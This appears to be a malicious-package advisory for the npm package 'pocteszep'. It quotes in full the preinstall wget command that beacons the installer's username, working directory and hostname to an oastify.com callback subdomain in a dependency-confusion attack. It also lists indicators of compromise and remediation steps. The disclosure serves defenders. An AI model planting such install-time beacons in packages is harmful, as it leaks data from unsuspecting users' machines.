Malicious package

pocteszep (npm)

Malicious code in pocteszep (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-5544
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall pocteszep

What this malware does

The package's npm preinstall lifecycle script runs wget --quiet "http://78dngdm3dhrrj8zgfm4es9m8bzhq5jt8.oastify.com/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)" (package.json line 8). On npm install, before anyone has a chance to review the code, the installer's username, current working directory, and hostname are sent over plaintext HTTP to a Burp Collaborator (oastify.com) callback subdomain, a typical out-of-band exfiltration channel used in dependency-confusion attacks. The package description self-identifies as a 'Simple PoC package for testing for dependency confusion vulnerabilities,' and the package contains no legitimate functionality beyond the lifecycle beacon. Any host that installs this package through a name collision with an internal dependency leaks its username, working directory and hostname to the attacker.

The OpenSSF Package Analysis project identified 'pocteszep' @ 1.0.2 (npm) as malicious.

It is considered malicious because:

  • The package communicates with a domain associated with malicious activity.

  • The package executes one or more commands associated with malicious behavior.

Malicious versions

5 flagged: 1.0.0, 1.0.1, 1.0.2, 1.0.4, 1.0.5

Indicators of compromise (SHA-256)

0928ae3dd121de41479d98b831bdff705eb1e0e5960a60863c22fc844749fdae
49e809bf95413ac0d2235c8a4abf33b3b2121af7e3b8fc2393e077c04ae28fdc
a469c97969991b78ee0e28cc8e4a43d14750da0d4e3d4519f6e21263c9143a8f
c146870dfd2759e9e7b37a0c37783c40dbc35ebbf4e2145c1763dacc0b1d9e9f
c559e1ff2e96350c1eb7bc1c091c250b5860a7712fa7b99bbfb8762910190af7
e13c609971d69e4699c85f451f163c7ab60ebb775171211fbd20d880b0ef2a2d
f0ba0d9e403509d779b0247843e7f8994a4caae4b7fe43f41192ff708a07d4cf
1724503cde62bd3c17ba606fd752f088dfb2b1c41ae612ef5074f93e9896ee00
384556848b90af0dc3c06aef498f7c87a97a47c2491454a572ac1a79b197bd14

Frequently asked questions

No. pocteszep on npm has been identified as a malicious package (versions 1.0.0, 1.0.1, 1.0.2, 1.0.4, 1.0.5 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-005379, IN-MAL-2026-005356, IN-MAL-2026-005380, IN-MAL-2026-005378, IN-MAL-2026-005366, IN-MAL-2026-005381, IN-MAL-2026-005355, IN-MAL-2026-005367

Credits

  • Amazon Inspector · finder
  • OpenSSF: Package Analysis · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.
